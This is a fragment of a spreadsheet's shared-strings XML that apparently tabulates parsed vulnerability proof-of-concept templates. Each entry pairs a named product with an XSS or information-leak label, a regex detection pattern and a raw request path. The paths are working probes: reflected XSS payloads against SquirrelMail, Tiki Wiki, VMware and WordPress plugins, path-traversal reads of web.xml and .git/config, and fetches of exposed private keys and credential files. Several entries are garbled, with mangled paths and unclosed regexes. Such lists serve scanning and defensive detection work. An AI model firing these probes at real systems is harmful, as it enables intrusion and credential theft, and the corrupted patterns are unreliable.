    <t>/perpustakaan/index.php/%22--%3E&lt;script&gt;alert(document.domain)&lt;/script&gt;/index.php</t>
  </si>
  <si>
    <t>Shoowbiz</t>
  </si>
  <si>
    <t>Shoowbiz_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/search\.php\?q=%3CScRipT%3Ealert\(document\.domain\);%3C/ScRipT%3E).*</t>
  </si>
  <si>
    <t>/search.php?q=%3CScRipT%3Ealert(document.domain);%3C/ScRipT%3E</t>
  </si>
  <si>
    <t>Siam</t>
  </si>
  <si>
    <t>Siam_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/siam\-convite/qrcode\.jsp\?url=1%22%3E%3Cimg%20src=x%20onerror=alert\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/siam-convite/qrcode.jsp?url=1%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E</t>
  </si>
  <si>
    <t>Siteminder Dom</t>
  </si>
  <si>
    <t>Siteminder Dom_跨站脚本</t>
  </si>
  <si>
    <t>Solarview Compact</t>
  </si>
  <si>
    <t>Solarview Compact_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/Solar_Image\.php\?mode=resize\&amp;fname=test%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/Solar_Image.php?mode=resize&amp;fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Squirrelmail 地址添加插件</t>
  </si>
  <si>
    <t>Squirrelmail 地址添加插件_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/plugins/address_add/add\.php\?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Squirrelmail 虚拟键盘插件</t>
  </si>
  <si>
    <t>Squirrelmail 虚拟键盘插件_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/plugins/vkeyboard/vkeyboard\.php\?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Steve</t>
  </si>
  <si>
    <t>Steve_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/steve/services/"%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E/services/|/services/"%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E/services/).*</t>
  </si>
  <si>
    <t>/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/|/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/</t>
  </si>
  <si>
    <t>Talroo 招聘脚本</t>
  </si>
  <si>
    <t>Talroo 招聘脚本_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?page=jobs\&amp;category=1\&amp;lrw3e%22onmouseover=%22confirm\(document\.domain\)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22k1n44=1).*</t>
  </si>
  <si>
    <t>/index.php?page=jobs&amp;category=1&amp;lrw3e%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22k1n44=1</t>
  </si>
  <si>
    <t>Tiki Wiki CMS</t>
  </si>
  <si>
    <t>Tiki Wiki CMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/tiki/tiki\-ajax_services\.php\?controller=comment\&amp;action=list\&amp;type=wiki\+page\&amp;objectId=&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;|/tiki\-ajax_services\.php\?controller=comment\&amp;action=list\&amp;type=wiki\+page\&amp;objectId=&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/tiki/tiki-ajax_services.php?controller=comment&amp;action=list&amp;type=wiki+page&amp;objectId=&lt;script&gt;alert(document.domain)&lt;/script&gt;|/tiki-ajax_services.php?controller=comment&amp;action=list&amp;type=wiki+page&amp;objectId=&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/tiki\-5\.2/tiki\-edit_wiki_section\.php\?type=%22%3E%3Cscript%3Ealert\(31337\)%3C/script%3E|/tiki\-edit_wiki_section\.php\?type=%22%3E%3Cscript%3Ealert\(31337\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E|/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E</t>
  </si>
  <si>
    <t>.*?(?:/tiki\-edit_wiki_section\.php\?type=%22%3E%3Cscript%3Ealert\(31337\)%3C/script%3E|/tiki\-5\.2/tiki\-edit_wiki_section\.php\?type=%22%3E%3Cscript%3Ealert\(31337\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E|/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E</t>
  </si>
  <si>
    <t>Vmware</t>
  </si>
  <si>
    <t>Vmware_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/login/\?redirectTo=/tenant/e\&amp;service=&lt;/script&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>Watu Quiz</t>
  </si>
  <si>
    <t>Watu Quiz_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:wp\-admin/admin\.php\?page=watu_question\&amp;question=1\&amp;action=edit\&amp;quiz=1"&gt;&lt;svg/onload=alert\(document\.domain\)&gt;).*</t>
  </si>
  <si>
    <t>wp-admin/admin.php?page=watu_question&amp;question=1&amp;action=edit&amp;quiz=1"&gt;&lt;svg/onload=alert(document.domain)&gt;</t>
  </si>
  <si>
    <t>Webigniter</t>
  </si>
  <si>
    <t>Webigniter_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/login\?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2fscript&gt;bn76w|/cms/login\?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2fscript&gt;bn76w).*</t>
  </si>
  <si>
    <t>/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript&gt;bn76w|/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript&gt;bn76w</t>
  </si>
  <si>
    <t>Wems 企业管理器</t>
  </si>
  <si>
    <t>Wems 企业管理器_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/guest/users/forgotten\?email=%22%3E%3Cscript%3Econfirm\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Whmcs Bridge</t>
  </si>
  <si>
    <t>Whmcs Bridge_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/options\-general\.php\?page=cc\-ce\-bridge\-cp\&amp;error=%3Cimg%20src%20onerror=alert\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/options-general.php?page=cc-ce-bridge-cp&amp;error=%3Cimg%20src%20onerror=alert(document.domain)%3E</t>
  </si>
  <si>
    <t>Yeswiki_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/\?PagePrincipale/rss\&amp;id=1%27%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/?PagePrincipale/rss&amp;id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Zendframework</t>
  </si>
  <si>
    <t>Zendframework_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/tests/Zend/Http/Client/_files/testRedirections\.php\?redirection=3\&amp;param=&lt;img/src=x%20onerror=alert\(document\.domain\)&gt;|/vendor/diablomedia/zendframework1\-http/tests/Zend/Http/Client/_files/testRedirections\.php\?redirection=3\&amp;param=&lt;img/src=x%20onerror=alert\(1\)&gt;).*</t>
  </si>
  <si>
    <t>/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&amp;param=&lt;img/src=x%20onerror=alert(document.domain)&gt;|/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&amp;param=&lt;img/src=x%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>ZZZCMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/3/ucenter_api/code/register_nodb\.php/"&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/3/ucenter_api/code/register_nodb.php/"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>.*?(?:/plugins/template/login\.php\?backurl=1%20onmouseover%3dalert\(/document\.domain/\)%20y%3d).*</t>
  </si>
  <si>
    <t>/plugins/template/login.php?backurl=1%20onmouseover%3dalert(/document.domain/)%20y%3d</t>
  </si>
  <si>
    <t xml:space="preserve">大汉 JCMS </t>
  </si>
  <si>
    <t>大汉 JCMS _跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/jcms/m_5_b/selmulti_column\.jsp\?type=1\&amp;userId=2222222%2b&gt;&lt;script&gt;alert\(/test/\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/jcms/m_5_b/selmulti_column.jsp?type=1&amp;userId=2222222%2b&gt;&lt;script&gt;alert(/test/)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Ansible 配置</t>
  </si>
  <si>
    <t>Ansible 配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/ansible\.cfg).*</t>
  </si>
  <si>
    <t>/ansible.cfg</t>
  </si>
  <si>
    <t>exposed_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Apache_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/airflow\.cfg).*</t>
  </si>
  <si>
    <t>/airflow.cfg</t>
  </si>
  <si>
    <t>airflow_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Php 配置</t>
  </si>
  <si>
    <t>Php 配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/phpcs\.xml).*</t>
  </si>
  <si>
    <t>/phpcs.xml</t>
  </si>
  <si>
    <t>Phpstan 配置</t>
  </si>
  <si>
    <t>Phpstan 配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/phpstan\.neon).*</t>
  </si>
  <si>
    <t>/phpstan.neon</t>
  </si>
  <si>
    <t>Pyproject 配置</t>
  </si>
  <si>
    <t>Pyproject 配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/pyproject\.toml).*</t>
  </si>
  <si>
    <t>/pyproject.toml</t>
  </si>
  <si>
    <t>Symfony 配置</t>
  </si>
  <si>
    <t>Symfony 配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/config/databases\.yml).*</t>
  </si>
  <si>
    <t>/config/databases.yml</t>
  </si>
  <si>
    <t>Vscode 配置</t>
  </si>
  <si>
    <t>Vscode 配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.vscode/sftp\.json).*</t>
  </si>
  <si>
    <t>/.vscode/sftp.json</t>
  </si>
  <si>
    <t>ftp_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Aem Querybuilder Jsonservlet</t>
  </si>
  <si>
    <t>Aem Querybuilder Jsonservlet_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/bin/querybuilder\.json|/bin/querybuilder\.feed|///bin///querybuilder\.feed|///bin///querybuilder\.json\.servlet|/bin/querybuilder\.json\.servlet|/bin/querybuilder\.feed\.servlet|///bin///querybuilder\.json|///bin///querybuilder\.feed\.servlet).*</t>
  </si>
  <si>
    <t>/bin/querybuilder.json|/bin/querybuilder.feed|///bin///querybuilder.feed|///bin///querybuilder.json.servlet|/bin/querybuilder.json.servlet|/bin/querybuilder.feed.servlet|///bin///querybuilder.json|///bin///querybuilder.feed.servlet</t>
  </si>
  <si>
    <t>Aem Secrets</t>
  </si>
  <si>
    <t>Aem Secrets_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.\.;//content/dam/formsanddocuments\.form\.validator\.html/home/\.\.\.\.children\.tidy\.\.\.infinity\.\.json|//content/dam/formsanddocuments\.form\.validator\.html/home/\.\.\.\.children\.tidy\.\.\.infinity\.\.json).*</t>
  </si>
  <si>
    <t>/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json|//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json</t>
  </si>
  <si>
    <t>.*?(?:/usr/share/davical/htdocs/setup\.php%3f|/html/usr/share/davical/htdocs/setup\.php%3f).*</t>
  </si>
  <si>
    <t>/usr/share/davical/htdocs/setup.php%3f|/html/usr/share/davical/htdocs/setup.php%3f</t>
  </si>
  <si>
    <t>Bsphp</t>
  </si>
  <si>
    <t>Bsphp_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/admin/index\.php\?m=admin\&amp;c=log\&amp;a=table_json\&amp;json=get\&amp;soso_ok=1\&amp;t=user_login_log\&amp;page=1\&amp;limit=10\&amp;bsphptime=1600407394176\&amp;soso_id=1\&amp;soso=\&amp;DESC=0).*</t>
  </si>
  <si>
    <t>Resin</t>
  </si>
  <si>
    <t>Resin_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/%20\.\./web\-inf/web\.xml|/resin\-doc/viewfile/\?file=/WEB\-INF/resin\-web\.xml).*</t>
  </si>
  <si>
    <t>/%20../web-inf/web.xml|/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml</t>
  </si>
  <si>
    <t>drupal模块站点地图</t>
  </si>
  <si>
    <t>drupal模块站点地图_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/sites/all/modules/xmlsitemap/xmlsitemap\.info).*</t>
  </si>
  <si>
    <t>/sites/all/modules/xmlsitemap/xmlsitemap.info</t>
  </si>
  <si>
    <t>Fckeditor</t>
  </si>
  <si>
    <t>Fckeditor_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/ckeditor/samples//fckeditor/_samples/default\.html</t>
  </si>
  <si>
    <t>/ckeditor/samples//fckeditor/_samples/default.html|/editor/ckeditor/samples/sample_posteddata.php</t>
  </si>
  <si>
    <t>Golang语言pprof调试</t>
  </si>
  <si>
    <t>Golang语言pprof调试_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/api/debug/pprof/|/api/debug/pprof/goroutine\?debug=1).*</t>
  </si>
  <si>
    <t>/api/debug/pprof/|/api/debug/pprof/goroutine?debug=1</t>
  </si>
  <si>
    <t>Go</t>
  </si>
  <si>
    <t>Go_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/go\.mod).*</t>
  </si>
  <si>
    <t>/go.mod</t>
  </si>
  <si>
    <t>Go语言pprof</t>
  </si>
  <si>
    <t>Go语言pprof_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/debug/pprof/|/debug/pprof/goroutine\?debug=1).*</t>
  </si>
  <si>
    <t>/debug/pprof/|/debug/pprof/goroutine?debug=1</t>
  </si>
  <si>
    <t>Iceflow VPN</t>
  </si>
  <si>
    <t>Iceflow VPN_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/log/vpn\.log|/log/system\.log|/log/access\.log|/log/debug\.log|/log/mobile\.log|/log/error\.log|/log/firewall\.log|/log/warn\.log).*</t>
  </si>
  <si>
    <t>/log/vpn.log|/log/system.log|/log/access.log|/log/debug.log|/log/mobile.log|/log/error.log|/log/firewall.log|/log/warn.log</t>
  </si>
  <si>
    <t>Joomla_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_booking\&amp;controller=customer\&amp;task=getUserData\&amp;id=123).*</t>
  </si>
  <si>
    <t>.*?(?:/joomla/administrator/manifests/files/joomla\.xml|/administrator/manifests/files/joomla\.xml).*</t>
  </si>
  <si>
    <t>/joomla/administrator/manifests/files/joomla.xml|/administrator/manifests/files/joomla.xml</t>
  </si>
  <si>
    <t>Kubernetes Kustomization</t>
  </si>
  <si>
    <t>Kubernetes Kustomization_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/kustomization\.yml).*</t>
  </si>
  <si>
    <t>/kustomization.yml</t>
  </si>
  <si>
    <t>docker_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>蓝凌_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/WS/Basic/Basic\.asmx).*</t>
  </si>
  <si>
    <t>/WS/Basic/Basic.asmx</t>
  </si>
  <si>
    <t>Magento_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/store/app/etc/local\.xml|/app/etc/local\.xml|/app/etc/local\.xml\.additional).*</t>
  </si>
  <si>
    <t>/store/app/etc/local.xml|/app/etc/local.xml|/app/etc/local.xml.additional</t>
  </si>
  <si>
    <t>.*?(?:/var/resource_config\.json).*</t>
  </si>
  <si>
    <t>/var/resource_config.json</t>
  </si>
  <si>
    <t>Milesight Industrial Cellular Routers</t>
  </si>
  <si>
    <t>Milesight Industrial Cellular Routers_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/lang/log/system\.log).*</t>
  </si>
  <si>
    <t>/lang/log/system.log</t>
  </si>
  <si>
    <t>Nginx_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/events\.\./\.git/config|/static\.\./\.git/config|/js\.\./\.git/config|/lib\.\./\.git/config|/media\.\./\.git/config|/content\.\./\.git/config|/css\.\./\.git/config|/assets\.\./\.git/config|/img\.\./\.git/config|/images\.\./\.git/config).*</t>
  </si>
  <si>
    <t>/events../.git/config|/static../.git/config|/js../.git/config|/lib../.git/config|/media../.git/config|/content../.git/config|/css../.git/config|/assets../.git/config|/img../.git/config|/images../.git/config</t>
  </si>
  <si>
    <t>git_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Phpmyadmin数据</t>
  </si>
  <si>
    <t>Phpmyadmin数据_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/phpMyAdmin/index\.php\?db=information_schema|/phpmyadmin/index\.php\?db=information_schema).*</t>
  </si>
  <si>
    <t>/phpMyAdmin/index.php?db=information_schema|/phpmyadmin/index.php?db=information_schema</t>
  </si>
  <si>
    <t>Php_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/php\.ini).*</t>
  </si>
  <si>
    <t>/php.ini</t>
  </si>
  <si>
    <t>Php源码</t>
  </si>
  <si>
    <t>Php源码_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.user\.ini).*</t>
  </si>
  <si>
    <t>/.user.ini</t>
  </si>
  <si>
    <t>锐捷 Rg</t>
  </si>
  <si>
    <t>锐捷 Rg_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/get_dkey\.php\?user=admin).*</t>
  </si>
  <si>
    <t>/get_dkey.php?user=admin</t>
  </si>
  <si>
    <t>致远OA_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/ext/trafaxserver/SystemManage/config\.jsp).*</t>
  </si>
  <si>
    <t>/yyoa/ext/trafaxserver/SystemManage/config.jsp</t>
  </si>
  <si>
    <t>config_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/createMysql\.jsp).*</t>
  </si>
  <si>
    <t>/yyoa/createMysql.jsp</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/assess/js/initDataAssess\.jsp).*</t>
  </si>
  <si>
    <t>/yyoa/assess/js/initDataAssess.jsp</t>
  </si>
  <si>
    <t>泛微_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/eoffice10/empty_scene/db/data/city\.json|/eoffice10/empty_scene/db/schema_mysql\.sql).*</t>
  </si>
  <si>
    <t>/eoffice10/empty_scene/db/data/city.json|/eoffice10/empty_scene/db/schema_mysql.sql</t>
  </si>
  <si>
    <t>CVE-2019-19985</t>
  </si>
  <si>
    <t>Wordpress_信息泄露_CVE-2019-19985</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=download_report\&amp;report=users\&amp;status=all).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=download_report&amp;report=users&amp;status=all</t>
  </si>
  <si>
    <t>大华_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/admin/user_getUserInfoByUserName\.action\?userName=system).*</t>
  </si>
  <si>
    <t>/admin/user_getUserInfoByUserName.action?userName=system</t>
  </si>
  <si>
    <t>锐捷_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/webgl\.data).*</t>
  </si>
  <si>
    <t>/webgl.data</t>
  </si>
  <si>
    <t>时空智友企业流程化管控系统wc文件</t>
  </si>
  <si>
    <t>时空智友企业流程化管控系统wc文件_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.svn/wc\.db).*</t>
  </si>
  <si>
    <t>/.svn/wc.db</t>
  </si>
  <si>
    <t>Adobe_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/etc/reports/diskusage\.html\?path=/content/dam</t>
  </si>
  <si>
    <t>/etc/reports/diskusage.html?path=/content/dam|/etc/reports/diskusage.html</t>
  </si>
  <si>
    <t>Argo</t>
  </si>
  <si>
    <t>Argo_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/WEB\-INF/classes/argo\.properties).*</t>
  </si>
  <si>
    <t>/WEB-INF/classes/argo.properties</t>
  </si>
  <si>
    <t>Caucho</t>
  </si>
  <si>
    <t>Caucho_信息泄露</t>
  </si>
  <si>
    <t>帆软_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/ReportServer\?op=fr_server\&amp;cmd=sc_getconnectioninfo|/WebReport/ReportServer\?op=fr_server\&amp;cmd=sc_getconnectioninfo).*</t>
  </si>
  <si>
    <t>/ReportServer?op=fr_server&amp;cmd=sc_getconnectioninfo|/WebReport/ReportServer?op=fr_server&amp;cmd=sc_getconnectioninfo</t>
  </si>
  <si>
    <t>华夏</t>
  </si>
  <si>
    <t>华夏_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/jshERP\-boot/platformConfig/getPlatform/\.\.;/\.\.;/\.\.;/jshERP\-boot/user/getAllList).*</t>
  </si>
  <si>
    <t>/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList</t>
  </si>
  <si>
    <t>Jetty</t>
  </si>
  <si>
    <t>Jetty_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/context/%2e/WEB\-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/context/%2e/WEB-INF/web.xml</t>
  </si>
  <si>
    <t>.*?(?:/usr/share/doc/websocketd/examples/php/dump\-env\.php%3f|/html/usr/share/doc/websocketd/examples/php/dump\-env\.php%3f).*</t>
  </si>
  <si>
    <t>/usr/share/doc/websocketd/examples/php/dump-env.php%3f|/html/usr/share/doc/websocketd/examples/php/dump-env.php%3f</t>
  </si>
  <si>
    <t>Bitrix全路径</t>
  </si>
  <si>
    <t>Bitrix全路径_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/bitrix/bitrix\.php).*</t>
  </si>
  <si>
    <t>/bitrix/bitrix.php</t>
  </si>
  <si>
    <t>Cobubrazor Tests Models Commondbfix 物理路径</t>
  </si>
  <si>
    <t>Cobubrazor Tests Models Commondbfix 物理路径_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/razor/tests/models/commonDbfix\.php).*</t>
  </si>
  <si>
    <t>/razor/tests/models/commonDbfix.php</t>
  </si>
  <si>
    <t>Composer配置</t>
  </si>
  <si>
    <t>Composer配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/composer\.json).*</t>
  </si>
  <si>
    <t>/composer.json</t>
  </si>
  <si>
    <t>Coremail配置</t>
  </si>
  <si>
    <t>Coremail配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/mailsms/s\?func=ADMIN:appState\&amp;dumpConfig=/).*</t>
  </si>
  <si>
    <t>/mailsms/s?func=ADMIN:appState&amp;dumpConfig=/</t>
  </si>
  <si>
    <t>Elmah日志</t>
  </si>
  <si>
    <t>Elmah日志_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/elmah\.axd).*</t>
  </si>
  <si>
    <t>/elmah.axd</t>
  </si>
  <si>
    <t>Github工作流配置</t>
  </si>
  <si>
    <t>Github工作流配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.github/workflows/coverage\.yml\\ithub/workflows/ci\-generated\.yml\\ithub/workflows/snyk\.yml\\ithub/workflows/release\.yml\\ithub/workflows/lint\.yml\\ithub/workflows/pr\.yml\\ithub/workflows/build\.yml\\ithub/workflows/build\.yaml\\ithub/workflows/tests\.yml\\ithub/workflows/ci\-push\.yml\\ithub/workflows/test\.yml\\ithub/workflows/release\.yaml\\ithub/workflows/test\.yaml\\ithub/workflows/main\.yml\\ithub/workflows/deploy\.yml\\ithub/workflows/CI\.yml\\ithub/workflows/tests\.yaml\\ithub/workflows/docker\.yml\\ithub/workflows/ci\-issues\.yml\\ithub/workflows/ci\.yml\\ithub/workflows/main\.yaml\\ithub/workflows/push\.yml\\ithub/workflows/ci\-daily\.yml\\ithub/workflows/publish\.yml\\ithub/workflows/automerge\.yml\\ithub/workflows/smoosh\-status\.yml\\ithub/workflows/ci\.yaml).*</t>
  </si>
  <si>
    <t>/.github/workflows/coverage.yml\ithub/workflows/ci-generated.yml\ithub/workflows/snyk.yml\ithub/workflows/release.yml\ithub/workflows/lint.yml\ithub/workflows/pr.yml\ithub/workflows/build.yml\ithub/workflows/build.yaml\ithub/workflows/tests.yml\ithub/workflows/ci-push.yml\ithub/workflows/test.yml\ithub/workflows/release.yaml\ithub/workflows/test.yaml\ithub/workflows/main.yml\ithub/workflows/deploy.yml\ithub/workflows/CI.yml\ithub/workflows/tests.yaml\ithub/workflows/docker.yml\ithub/workflows/ci-issues.yml\ithub/workflows/ci.yml\ithub/workflows/main.yaml\ithub/workflows/push.yml\ithub/workflows/ci-daily.yml\ithub/workflows/publish.yml\ithub/workflows/automerge.yml\ithub/workflows/smoosh-status.yml\ithub/workflows/ci.yaml</t>
  </si>
  <si>
    <t>Git配置</t>
  </si>
  <si>
    <t>Git配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.git/config).*</t>
  </si>
  <si>
    <t>/.git/config</t>
  </si>
  <si>
    <t>Git日志</t>
  </si>
  <si>
    <t>Git日志_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.git/logs/HEAD).*</t>
  </si>
  <si>
    <t>/.git/logs/HEAD</t>
  </si>
  <si>
    <t>Glpi状态域名</t>
  </si>
  <si>
    <t>Glpi状态域名_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/glpi2/status\.php).*</t>
  </si>
  <si>
    <t>/glpi2/status.php</t>
  </si>
  <si>
    <t>Kubernetes Etcd 密钥</t>
  </si>
  <si>
    <t>Kubernetes Etcd 密钥_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/apiserver\-etcd\-client\.key).*</t>
  </si>
  <si>
    <t>/apiserver-etcd-client.key</t>
  </si>
  <si>
    <t>Oracle Ebs Sql日志</t>
  </si>
  <si>
    <t>Oracle Ebs Sql日志_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/OA_HTML/bin/sqlnet\.log).*</t>
  </si>
  <si>
    <t>/OA_HTML/bin/sqlnet.log</t>
  </si>
  <si>
    <t>Oracle Ebs凭据</t>
  </si>
  <si>
    <t>Oracle Ebs凭据_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/OA_HTML/jtfwrepo\.xml).*</t>
  </si>
  <si>
    <t>/OA_HTML/jtfwrepo.xml</t>
  </si>
  <si>
    <t>Putty私钥</t>
  </si>
  <si>
    <t>Putty私钥_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.ssh/\{\{Hostname\}\}\.ppk|/\{\{Hostname\}\}\.ppk\\utty/my\.ppk\\utty/putty\.ppk\\utty/\{\{Hostname\}\}\.ppk|/putty\.ppk|/my\.ppk\\sh/putty\.ppk|/putty\.ppk\\utty/putty\.ppk|/my\.ppk|/\{\{Hostname\}\}\.ppk\\utty/\{\{Hostname\}\}\.ppk\\sh/\{\{Hostname\}\}\.ppk\\sh/putty\.ppk\\utty/my\.ppkutty/my\.ppk\\utty/putty\.ppk|/\{\{Hostname\}\}\.ppk|/my\.ppk\\sh/\{\{Hostname\}\}\.ppk\\sh/putty\.ppk\\utty/\{\{Hostname\}\}\.ppk).*</t>
  </si>
  <si>
    <t>/.ssh/{{Hostname}}.ppk|/{{Hostname}}.ppk\utty/my.ppk\utty/putty.ppk\utty/{{Hostname}}.ppk|/putty.ppk|/my.ppk\sh/putty.ppk|/putty.ppk\utty/putty.ppk|/my.ppk|/{{Hostname}}.ppk\utty/{{Hostname}}.ppk\sh/{{Hostname}}.ppk\sh/putty.ppk\utty/my.ppkutty/my.ppk\utty/putty.ppk|/{{Hostname}}.ppk|/my.ppk\sh/{{Hostname}}.ppk\sh/putty.ppk\utty/{{Hostname}}.ppk</t>
  </si>
  <si>
    <t>Roundcube日志</t>
  </si>
  <si>
    <t>Roundcube日志_信息泄露</t>
  </si>
  <si>
